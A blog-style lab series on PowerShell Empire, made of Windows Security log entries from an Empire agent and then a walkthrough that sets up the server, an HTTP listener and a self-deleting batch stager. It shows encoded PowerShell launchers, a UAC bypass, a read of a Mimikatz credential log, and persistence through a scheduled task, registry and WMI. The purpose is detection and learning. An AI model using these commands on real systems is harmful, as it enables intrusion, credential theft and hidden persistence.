First up, when the file is executed from the browser, we see from the Security Event Log that chrome.exe created the cmd.exe process with the command line arguments which includes the welcome.bat file.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x700AD

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x10b8
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		Mandatory Label\Medium Mandatory Level
	Creator Process ID:	0x15a4
	Creator Process Name:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
	Process Command Line:	C:\WINDOWS\system32\cmd.exe /c ""C:\Users\sec560\Downloads\welcome.bat" "

...

We then see cmd.exe spawns powershell, to read the contents of the welcome.bat file.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x700AD

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xbd0
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		Mandatory Label\Medium Mandatory Level
	Creator Process ID:	0x10b8
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"  -nol -nop -ep bypass "[IO.File]::ReadAllText('C:\Users\sec560\Downloads\welcome.bat')|iex" 
...

Next we see the contents of welcome.bat being executed.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x700AD

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xe10
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		Mandatory Label\Medium Mandatory Level
	Creator Process ID:	0xbd0
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAUwBpAG8ATgBUAGEAQgBsAEUALgBQAFMAVgBFAHIAcwBpAG8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4A...AEUAcgArACQAVAApADsAJABJAHYAPQAkAEQAYQBUAGEAWwAwAC4ALgAzAF0AOwAkAEQAQQB0AEEAPQAkAGQAYQBUAGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUATgBHAHQAaABdADsALQBqAE8ASQBuAFsAQwBIAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
...

Now that access has been gained, looking to see what the other commands look like when a request is made against the system.

Surprisingly, when the whoami command was run from within the powershell-empire interactive environment, I did not see any entry in the log.

While no result was returned when whoami was run within the interactive environment, once I dropped down to Shell, I was able to see entry in the logs.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x700AD

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x14d0
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		Mandatory Label\Medium Mandatory Level
	Creator Process ID:	0xe10
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\cmd.exe" /c "whoami /groups"

For the activity to enumerate the local administrators group, we see the following in the log.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x700AD

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x848
	New Process Name:	C:\Windows\System32\net1.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		Mandatory Label\Medium Mandatory Level
	Creator Process ID:	0xa88
	Creator Process Name:	C:\Windows\System32\net.exe
	Process Command Line:	C:\WINDOWS\system32\net1 localgroup administrators
...

Note, if you look closely, you will see it says net1.exe, rather than net.exe. This is because net.exe spawns net1.exe to perform this task.

For the BypassUAC, I saw the following entry in the log, which I believe is associated with the bypass.

First, I see consent.exe is being executed.

A new process has been created.

Creator Subject:
	Security ID:		SYSTEM
	Account Name:		SEC560STUDENT$
	Account Domain:		SEC560
	Logon ID:		0x3E7

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x36c
	New Process Name:	C:\Windows\System32\consent.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\System Mandatory Level
	Creator Process ID:	0x148
	Creator Process Name:	C:\Windows\System32\svchost.exe
	Process Command Line:	consent.exe 328 318 00000277C25C97A0

...

This is then followed by debug.bat being run via cmd.exe.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xf0c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xb88
	Creator Process Name:	C:\Windows\System32\cliconfg.exe
	Process Command Line:	"C:\WINDOWS\system32\cmd.exe" /C "C:\Users\sec560\AppData\Local\Temp\debug.bat"

I also see ...

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1104
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xf0c
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	powershell  -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBFAFIAUwBJAG8AbgBUAEEAQgBsAGUALgBQAFMAVgBFAFIAUwBpAG8AbgAuAE0AQQBKAG8AcgAgAC0ARwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4A...AFQAcABCAFIAawBPAC8AZwA9ACIAKQA7ACQAZABBAFQAQQA9ACQAQgA0ADgARQAuAEQAbwBXAG4AbABPAEEAZABEAGEAdABBACgAJABTAGUAUgArACQAdAApADsAJABJAHYAPQAkAEQAQQB0AEEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAEQAQQBUAGEAWwA0AC4ALgAkAEQAYQBUAGEALgBMAGUAbgBHAFQAaABdADsALQBqAE8AaQBuAFsAQwBoAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

The above then follows the deletion of the debug.dat file.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x140c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xf0c
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	cmd  /c del "C:\Users\sec560\AppData\Local\Temp\debug.bat"

Similar to the previous example, I noticed that consent.exe was invoked right before the following was seen in the log.

A new process has been created.

Creator Subject:
	Security ID:		SYSTEM
	Account Name:		SEC560STUDENT$
	Account Domain:		SEC560
	Logon ID:		0x3E7

Target Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Process Information:
	New Process ID:		0x1670
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xe10
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBFAHIAcwBpAG8ATgBUAEEAYgBsAEUALgBQAFMAVgBlAFIAcwBpAE8AbgAuAE0AYQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4A...AVwBDADEAWQBuAGYAQQA4AFkAPQAiACkAOwAkAEQAYQBUAEEAPQAkAEIANAA4AEUALgBEAG8AVwBuAGwAbwBBAGQARABBAHQAQQAoACQAUwBlAFIAKwAkAFQAKQA7ACQAaQB2AD0AJABEAEEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABhAD0AJABEAGEAdABhAFsANAAuAC4AJABEAEEAdABBAC4AbABlAE4AZwB0AEgAXQA7AC0ASgBPAEkATgBbAEMAaABhAFIAWwBdAF0AKAAmACAAJABSACAAJABEAGEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=

Something else I noticed, is they both ran whoami /groups before executing their commands. Maybe this is just a coincidence or something other artifact of the system. Who knows. Not enough time to dig into this at this point.

Below shows what is seen when attempting to access the mimilsa.log file.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xd6c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1104
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\cmd.exe" /c "type c:\windows\system32\mimilsa.log"

As the command was run to perform packet capture, we see the following in the logs.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1030
	New Process Name:	C:\Windows\System32\netsh.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1104
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\netsh.exe" trace start capture=yes traceFile=c:\tmp\capture.etl maxSize=1MB

It looks like when netsh.exe runs, it runs the dispdiag.exe and creates a file named dispdiag_start.dat.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x754
	New Process Name:	C:\Windows\System32\dispdiag.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1030
	Creator Process Name:	C:\Windows\System32\netsh.exe
	Process Command Line:	C:\WINDOWS\system32\dispdiag.exe -out dispdiag_start.dat

...

Looking at the schedule task being created.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1570
	New Process Name:	C:\Windows\System32\schtasks.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1104
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\schtasks.exe" /Create /F /RU system /SC ONLOGON /TN SecurityNik-Empire-Schtask /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:\Software\Microsoft\Network debug).debug)))\""

Looking to the registry, we see ...

C:\WINDOWS\system32>reg query HKLM\Software\Microsoft\Network /v debug                                                                                        HKEY_LOCAL_MACHINE\Software\Microsoft\Network                                      debug    REG_SZ    SQBmACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAcwBpAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGY 
...
JAFYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAQQBUAEEAPQAkAGQAYQB0AEEAWwA0AC4ALgAkAEQAYQB0AEEALgBsAGUATgBnAFQASABdADsALQBqAG8ASQBuAFsAQwBIAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAQQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

Confirming the schtasks was created.

C:\>schtasks /query /TN SecurityNik-Empire-Schtask   
Folder: \    
TaskName                                 Next Run Time          Status  
======================================== ====================== ===============
SecurityNik-Empire-Schtask               N/A                    Ready

Looking at the registry after the registry persistence was added.

C:\WINDOWS\system32>reg query HKLM\software\Microsoft\Windows\CurrentVersion /v debug    
HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion                       debug    REG_SZ    SQBGACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAEEAYgBsAEUALgBQAFMAVgBFAFIAUwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwAp...QQB0AEEAWwAwAC4ALgAzAF0AOwAkAEQAYQB0AEEAPQAkAGQAYQB0AEEAWwA0AC4ALgAkAEQAYQBUAEEALgBsAEUAbgBHAFQAaABdADsALQBqAE8AaQBOAFsAQwBoAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQBUAEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

For the WMI persistence, using autorunsc.exe from Sysinternals shows the following.

C:\Tools\SysinternalsSuite>autorunsc.exe  -nobanner  *  | more

   Updater  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"  File not found: $x=$((gp HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Wrin Hidden -enc $x

There is so much we can see from the logs. However, I just wanted a sneak peak.

That's it for this post. See you in the next post, where we look at things from the packets perspective.

Other posts in this series:

Beginning Powershell Empire - The Attack in 10 steps
Powershell Empire Log Analysis
Powershell Empire Packet Analysis
Powershell Empire Detection with Snort
Powershell Empire - Detection with Zeek

Beginning Powershell Empire - The Attack in 10 steps

In this 5 part series, I'm learning more about Powershell Empire from the perspectives of using the tool, analyzing the logs which gets created as well as the packets as they traverse the networks.

1. Setup PowerShell Empire

First, checking what services are currently listening on my local device.

┌──(root💀securitynik)-[~]
└─# ss --numeric --listening --tcp 
State        Recv-Q        Send-Q               Local Address:Port               Peer Address:Port       Process

Next, I'm going to clear the database to remove any artifiacts from before.

┌──(root💀securitynik)-[~/packets]
└─# powershell-empire server --reset
[*] Loading default config
[>] Would you like to reset your Empire instance? [y/N]: y
cp: cannot stat './powershell/Invoke-Obfuscation': No such file or directory
[*] Setting up database.
[*] Adding default user.
[*] Adding database config.
[*] Generating random staging key
[*] Adding default bypasses.
[*] Adding default keyword obfuscation functions.

Loading up the server side of PowerShell Empire using the default configuration.

┌──(root💀securitynik)-[~/packets]
└─# powershell-empire server --debug --config /etc/powershell-empire/config.yaml --restip 0.0.0.0 --socketport 9999 --username securitynik --password Testing1
Loading config from /etc/powershell-empire/config.yaml
[*] Loading stagers from: /usr/share/powershell-empire/empire/server/stagers/
[*] Loading modules from: /usr/share/powershell-empire/empire/server/modules/
[*] Loading listeners from: /usr/share/powershell-empire/empire/server/listeners/
[*] Loading malleable profiles from: /usr/share/powershell-empire/empire/server/data/profiles
[*] Searching for plugins at /usr/share/powershell-empire/empire/server/plugins
[*] Plugin csharpserver found.
[*] Initializing plugin...
[*] Doing custom initialization...
[*] Loading Empire C# server plugin
[*] Registering plugin with menu...
[*] Empire starting up...
Username updated
Password updated
[*] Starting Empire RESTful API on 0.0.0.0:1337
[*] Starting Empire SocketIO on 0.0.0.0:9999
[*] Testing APIs
[+] Empire RESTful API successfully started
[+] Empire SocketIO successfully started
[*] Cleaning up test user
Server >
EMPIRE TEAM SERVER | 0 Agent(s) | 0 Listener(s) | 1 Plugin(s)

Verifying that the server is now listening.

┌──(root💀securitynik)-[~]
└─# ss --numeric --listening --tcp
State            Recv-Q           Send-Q                       Local Address:Port                       Peer Address:Port           Process           
LISTEN           0                128                                0.0.0.0:9999                            0.0.0.0:*                                
LISTEN           0                128                                0.0.0.0:1337                            0.0.0.0:*

With the server listening, time to connect the client

┌──(root💀securitynik)-[~]
└─# powershell-empire client
[*] Loading default config
...

Use the 'connect' command to connect to your Empire server.
'connect -c localhost' will connect to a local empire instance with all the defaults
including the default username and password.
[*] Attempting to connect to server: localhost
[!] Invalid username and/or password
(Empire) >

Now that we are in the Empire environment, time to connect to connect to the server.

To get help while connecting, in the client console:
(Empire) > connect --help
(Empire) > connect https://10.0.0.107 --port=1337 --socketport=9999 --username=securitynik --password=Testing1

========================================================================================
 [Empire] Post-Exploitation Framework
========================================================================================
 [Version] 4.0.2 BC Security Fork | [Web] https://github.com/BC-SECURITY/Empire
========================================================================================
 [Starkiller] Multi-User GUI | [Web] https://github.com/BC-SECURITY/Starkiller
========================================================================================

   _______   ___  ___   ______    __   ______        _______
  |   ____| |   \/   | |   _  \  |  | |   _  \      |   ____|
  |  |__    |  \  /  | |  |_)  | |  | |  |_)  |     |  |__
  |   __|   |  |\/|  | |   ___/  |  | |      /      |   __|
  |  |____  |  |  |  | |  |      |  | |  |\  \----. |  |____
  |_______| |__|  |__| | _|      |__| | _| `._____| |_______|


       391 modules currently loaded

       0 listeners currently active

       0 agents currently active

[*] Connected to https://10.0.0.107
(Empire) >


Connected to https://10.0.0.107:1337. 0 agents. 1 unread messages.

Looking at the server side of the communication, I see:

[+] securitynik connected to socketio

Further confirming that the client is connected to the server.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# ss --numeric --tcp | grep --perl-regexp "9999|1337"
ESTAB 0      0         10.0.0.107:9999    10.0.0.107:41866       
ESTAB 0      0         10.0.0.107:41866   10.0.0.107:9999

Good stuff. We're making progress.

Checking to see which listeners are currently configured if any.

(Empire) > listeners

┌Listeners List──────┬───────────────────┬────────────┬─────────┐
│ ID │ Name │ Module │ Listener Category │ Created At │ Enabled │
└────┴──────┴────────┴───────────────────┴────────────┴─────────┘

None! Setting up my first listener by reviewing and configuring some of the available options.

(Empire: listeners) > uselistener http

(Empire: uselistener/http) > info

 Author       @harmj0y                                                              
 Description  Starts a http[s] listener (PowerShell or Python) that uses a GET/POST 
              approach.                                                             
 Name         HTTP[S] 


 (Empire: uselistener/http) > set Cookie SecurityNik-HTTP-Listener-Cookie
[*] Set Cookie to SecurityNik-HTTP-Listener-Cookie

(Empire: uselistener/http) > set KillDate 11/22/2021
[*] Set KillDate to 11/22/2021

(Empire: uselistener/http) > set UserAgent SecurityNik-HTTP-Listener-User-Agent
[*] Set UserAgent to SecurityNik-HTTP-Listener-User-Agent

(Empire: uselistener/http) > set WorkingHours 00:00-23:59
[*] Set WorkingHours to 00:00-23:59

[*] Set BindIP to 10.0.0.107
(Empire: uselistener/http) >

(Empire: uselistener/http) > set Port 443
[*] Set Port to 443


(Empire: uselistener/http) > set DefaultDelay 60
[*] Set DefaultDelay to 60

I changed the default delay / reachback from 5 seconds as I did not wish to see too much noise during the packet capturing.

Revisiting the configured options:

(Empire: uselistener/http) > options

┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                               │ Required │ Description                         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ BindIP           │ 10.0.0.107                          │ True     │ The IP to bind to on the control    │
│                  │                                     │          │ server.                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ CertPath         │                                     │ False    │ Certificate path for https          │
│                  │                                     │          │ listeners.                          │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Cookie           │ SecurityNik-HTTP-Listener-Cookie    │ False    │ Custom Cookie Name                  │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultDelay     │ 60                                  │ True     │ Agent delay/reach back interval (in │
│                  │                                     │          │ seconds).                           │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultJitter    │ 0.0                                 │ True     │ Jitter in agent reachback interval  │
│                  │                                     │          │ (0.0-1.0).                          │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultLostLimit │ 60                                  │ True     │ Number of missed checkins before    │
│                  │                                     │          │ exiting                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultProfile   │ /admin/get.php,/news.php,/login/pro │ True     │ Default communication profile for   │
│                  │ cess.php|Mozilla/5.0 (Windows NT    │          │ the agent.                          │
│                  │ 6.1; WOW64; Trident/7.0; rv:11.0)   │          │                                     │
│                  │ like Gecko                          │          │                                     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Headers          │ Server:Microsoft-IIS/7.5            │ True     │ Headers for the control server.     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Host             │ http://10.0.0.107                   │ True     │ Hostname/IP for staging.            │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ KillDate         │ 11/22/2021                          │ False    │ Date for the listener to exit       │
│                  │                                     │          │ (MM/dd/yyyy).                       │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Launcher         │ powershell -noP -sta -w 1 -enc      │ True     │ Launcher string.                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Name             │ http                                │ True     │ Name for the listener.              │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Port             │ 443                                 │ True     │ Port for the listener.              │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                             │ False    │ Proxy to use for request (default,  │
│                  │                                     │          │ none, or other).                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                             │ False    │ Proxy credentials                   │
│                  │                                     │          │ ([domain\]username:password) to use │
│                  │                                     │          │ for request (default, none, or      │
│                  │                                     │          │ other).                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ SlackURL         │                                     │ False    │ Your Slack Incoming Webhook URL to  │
│                  │                                     │          │ communicate with your Slack         │
│                  │                                     │          │ instance.                           │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ StagerURI        │                                     │ False    │ URI for the stager. Must use        │
│                  │                                     │          │ /download/. Example:                │
│                  │                                     │          │ /download/stager.php                │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ StagingKey       │ ?4M6q)cLnvli}UCsu:rwf![~]79{#=O/    │ True     │ Staging key for initial agent       │
│                  │                                     │          │ negotiation.                        │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ SecurityNik-HTTP-Listener-User-     │ False    │ User-agent string to use for the    │
│                  │ Agent                               │          │ staging request (default, none, or  │
│                  │                                     │          │ other).                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ WorkingHours     │ 00:00-23:59                         │ False    │ Hours for the agent to operate      │
│                  │                                     │          │ (09:00-17:00).                      │
└──────────────────┴─────────────────────────────────────┴──────────┴─────────────────────────────────────┘

With the above configured, I then run execute to start the Listener.

(Empire: uselistener/http) > execute
[+] Listener http successfully started

On the server side, the following was seen

[*] Starting listener 'http'
[+] Listener successfully started!
Server >

EMPIRE TEAM SERVER | 0 Agent(s) | 1 Listener(s) | 1 Plugin(s)

Running the listener command again, this time I see.

(Empire: uselistener/http) > listeners

┌Listeners List──────┬───────────────────┬──────────────────────────────────────────┬─────────┐
│ ID │ Name │ Module │ Listener Category │ Created At                               │ Enabled │
├────┼──────┼────────┼───────────────────┼──────────────────────────────────────────┼─────────┤
│ 1  │ http │ http   │ client_server     │ 2021-11-20 12:35:47 EST (48 seconds ago) │ True    │
└────┴──────┴────────┴───────────────────┴──────────────────────────────────────────┴─────────┘

Further confirming there is a listener on port 443.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# ss --numeric --tcp --listening 
State         Recv-Q        Send-Q               Local Address:Port               Peer Address:Port       Process        
LISTEN        0             128                        0.0.0.0:9999                    0.0.0.0:*                         
LISTEN        0             128                        0.0.0.0:1337                    0.0.0.0:*                         
LISTEN        0             128                     10.0.0.107:443                     0.0.0.0:*

With the listener configured, next up, selecting a stager.

I selected the windows/launcher_bat. This creates a self deleting batching file.

(Empire: listeners) > usestager windows/launcher_bat

(Empire: usestager/windows/launcher_bat) > set Listener http
[*] Set Listener to http

(Empire: usestager/windows/launcher_bat) > set OutFile welcome.bat
[*] Set OutFile to welcome.bat

(Empire: usestager/windows/launcher_bat) > set UserAgent securitynik-launcher-bat-User-Agent
[*] Set UserAgent to securitynik-launcher-bat-User-Agent

Reviewing the configured options

(Empire: usestager/windows/launcher_bat) > options

┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                               │ Required │ Description                         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw                  │ False    │ Bypasses as a space separated list  │
│                  │                                     │          │ to be prepended to the launcher     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Delete           │ True                                │ False    │ Switch. Delete .bat after running.  │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Language         │ powershell                          │ True     │ Language of the stager to generate. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                                │ True     │ Listener to generate stager for.    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False                               │ False    │ Switch. Obfuscate the launcher      │
│                  │                                     │          │ powershell code, uses the           │
│                  │                                     │          │ ObfuscateCommand for obfuscation    │
│                  │                                     │          │ types. For powershell only.         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1                         │ False    │ The Invoke-Obfuscation command to   │
│                  │                                     │          │ use. Only used if Obfuscate switch  │
│                  │                                     │          │ is True. For powershell only.       │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ OutFile          │ welcome.bat                         │ False    │ Filename that should be used for    │
│                  │                                     │          │ the generated output, otherwise     │
│                  │                                     │          │ returned as a string.               │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                             │ False    │ Proxy to use for request (default,  │
│                  │                                     │          │ none, or other).                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                             │ False    │ Proxy credentials                   │
│                  │                                     │          │ ([domain\]username:password) to use │
│                  │                                     │          │ for request (default, none, or      │
│                  │                                     │          │ other).                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ StagerRetries    │ 0                                   │ False    │ Times for the stager to retry       │
│                  │                                     │          │ connecting.                         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ securitynik-launcher-bat-User-Agent │ False    │ User-agent string to use for the    │
│                  │                                     │          │ staging request (default, none, or  │
│                  │                                     │          │ other).                             │
└──────────────────┴─────────────────────────────────────┴──────────┴─────────────────────────────────────┘

With everything in place, time to generate the welcome.bat file.

(Empire: usestager/windows/launcher_bat) > generate
[*] welcome.bat written to /usr/share/powershell-empire/empire/client/generated-stagers/welcome.bat

Copy the file to the /tmp folder.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# cd /tmp/

┌──(root💀securitynik)-[/tmp]
